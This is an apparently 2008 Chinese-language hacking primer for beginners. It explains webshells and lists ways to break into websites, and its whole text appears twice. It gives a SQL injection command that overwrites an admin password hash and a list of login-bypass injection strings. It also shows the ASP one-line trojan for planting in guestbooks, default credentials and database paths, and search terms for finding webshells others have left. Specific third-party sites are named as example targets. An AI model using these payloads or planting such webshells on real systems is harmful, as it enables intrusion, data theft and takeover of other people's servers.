非常不錯的腳本入侵基礎(chǔ)知識總結(jié)第1/2頁
更新時間:2008年06月14日 19:51:12 作者:
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。
一.Webshell是什么?這是很多朋友在疑惑的問題,
什么是webshell?今天我們就講講這個話題!
webshell是web入侵的腳本攻擊工具。
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網(wǎng)站服務(wù)器,包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。</P>
為了更好理解webshell我們學(xué)習(xí)兩個概念:
什么是“木馬”?“木馬”全稱是“特洛伊木馬(Trojan<BR>Horse)”,原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設(shè)計人員在其可從網(wǎng)絡(luò)上下載 (Download)的應(yīng)用程序或游戲中,包含了可以控制用戶的計算機(jī)系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓。
什么是后門?大家都知道,一臺計算機(jī)上有65535個端口,那么如果把計算機(jī)看作是一間屋子,那么這65535個端口就可以它看做是計算機(jī)為了與外界連接所開的65535 扇門。每個門的背后都是一個服務(wù)。有的門是主人特地打開迎接客人的(提供服務(wù)),有的門是主人為了出去訪問客人而開設(shè)的(訪問遠(yuǎn)程服務(wù))——理論上,剩下的其他門都該是關(guān)閉著的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進(jìn)入,主人的隱私被刺探,生活被打擾,甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。
webshell的優(yōu)點
webshell 最大的優(yōu)點就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過80端口傳遞的,因此不會被防火墻攔截。并且使用webshell一般不會在系統(tǒng)日志中留下記錄,只會在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入<BR>
2,使用注入工具<BR>
3,在瀏覽器里打開百度,輸入搜索關(guān)鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執(zhí)行一個操作",然后點擊搜索,很快就可以看到檢索到了大量的查詢結(jié)果.<BR>其他的東西,暫時不多說了,以后再深入吧,每天準(zhǔn)備一個話題,需要的是巨大的毅力和努力,我們舉辦的每日講座就是為了通俗容易懂的普及信息安全知識,讓不喜歡看文章,覺得信息安全知識很深奧枯燥的人都明白,其實他只要花很少時間,就可以了解很多信息安全知識!
二.菜鳥學(xué)習(xí)入侵的14種可利用方法
作者:佚名 文章來源:本站原創(chuàng) 點擊數(shù):560 更新時間:2006-8-9
1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數(shù)據(jù)庫].那么我們可以用以下命令:
http://注入網(wǎng)址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]
3.旁注,也就是跨站.
我們?nèi)肭帜痴緯r可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務(wù)器的站點,然后在利用這個站點用提權(quán),嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務(wù)器的絕對路徑經(jīng)過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
如果你能看到:'E:\test\test\database\test.asa'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務(wù)器。
這樣的就是數(shù)據(jù)庫了。下載時用FLASHGET換成.MDB格式的就行.
5.'or'='or'這是一個可以連接SQL的語名句.可以直接進(jìn)入后臺。我收集了一下。類似的還有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社會工程學(xué)。這個我們都知道吧。就是猜解。
7.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本.
EY:http://www.scbzlx.com/book/book.asp[這個就是ASP格式的數(shù)據(jù)庫],再寫入一句話木馬
8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個站用的是:杰出校友錄,源碼我下過了,
默認(rèn)數(shù)據(jù)庫/webshell路徑:\database\liangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin
9.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
什么是webshell?今天我們就講講這個話題!
webshell是web入侵的腳本攻擊工具。
簡單的說來,webshell就是一個asp或php木馬后門,黑客在入侵了一個網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁文件混在一起。然后黑客就可以用web的方式,通過asp或php木馬后門控制網(wǎng)站服務(wù)器,包括上傳下載文件、查看數(shù)據(jù)庫、執(zhí)行任意程序命令等。</P>
為了更好理解webshell我們學(xué)習(xí)兩個概念:
什么是“木馬”?“木馬”全稱是“特洛伊木馬(Trojan<BR>Horse)”,原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設(shè)計人員在其可從網(wǎng)絡(luò)上下載 (Download)的應(yīng)用程序或游戲中,包含了可以控制用戶的計算機(jī)系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓。
什么是后門?大家都知道,一臺計算機(jī)上有65535個端口,那么如果把計算機(jī)看作是一間屋子,那么這65535個端口就可以它看做是計算機(jī)為了與外界連接所開的65535 扇門。每個門的背后都是一個服務(wù)。有的門是主人特地打開迎接客人的(提供服務(wù)),有的門是主人為了出去訪問客人而開設(shè)的(訪問遠(yuǎn)程服務(wù))——理論上,剩下的其他門都該是關(guān)閉著的,但偏偏由于各種原因,很多門都是開啟的。于是就有好事者進(jìn)入,主人的隱私被刺探,生活被打擾,甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。
webshell的優(yōu)點
webshell 最大的優(yōu)點就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過80端口傳遞的,因此不會被防火墻攔截。并且使用webshell一般不會在系統(tǒng)日志中留下記錄,只會在網(wǎng)站的web日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗的管理員是很難看出入侵痕跡的。
如何尋找webshel:
1,腳本攻擊SQL注入<BR>
2,使用注入工具<BR>
3,在瀏覽器里打開百度,輸入搜索關(guān)鍵詞"在本頁操作不需要FSO支持&"或者"一次只能執(zhí)行一個操作",然后點擊搜索,很快就可以看到檢索到了大量的查詢結(jié)果.<BR>其他的東西,暫時不多說了,以后再深入吧,每天準(zhǔn)備一個話題,需要的是巨大的毅力和努力,我們舉辦的每日講座就是為了通俗容易懂的普及信息安全知識,讓不喜歡看文章,覺得信息安全知識很深奧枯燥的人都明白,其實他只要花很少時間,就可以了解很多信息安全知識!
二.菜鳥學(xué)習(xí)入侵的14種可利用方法
作者:佚名 文章來源:本站原創(chuàng) 點擊數(shù):560 更新時間:2006-8-9
1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數(shù)據(jù)庫].那么我們可以用以下命令:
http://注入網(wǎng)址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]
3.旁注,也就是跨站.
我們?nèi)肭帜痴緯r可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務(wù)器的站點,然后在利用這個站點用提權(quán),嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務(wù)器的絕對路徑經(jīng)過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
如果你能看到:'E:\test\test\database\test.asa'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務(wù)器。
這樣的就是數(shù)據(jù)庫了。下載時用FLASHGET換成.MDB格式的就行.
5.'or'='or'這是一個可以連接SQL的語名句.可以直接進(jìn)入后臺。我收集了一下。類似的還有:
'or''=' " or "a"="a ') or ('a'='a ") or ("a"="a or 1=1-- ' or 'a'='a
6.社會工程學(xué)。這個我們都知道吧。就是猜解。
7.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本.
EY:http://www.scbzlx.com/book/book.asp[這個就是ASP格式的數(shù)據(jù)庫],再寫入一句話木馬
8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個站用的是:杰出校友錄,源碼我下過了,
默認(rèn)數(shù)據(jù)庫/webshell路徑:\database\liangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin
9.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
相關(guān)文章
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程...2007-11-11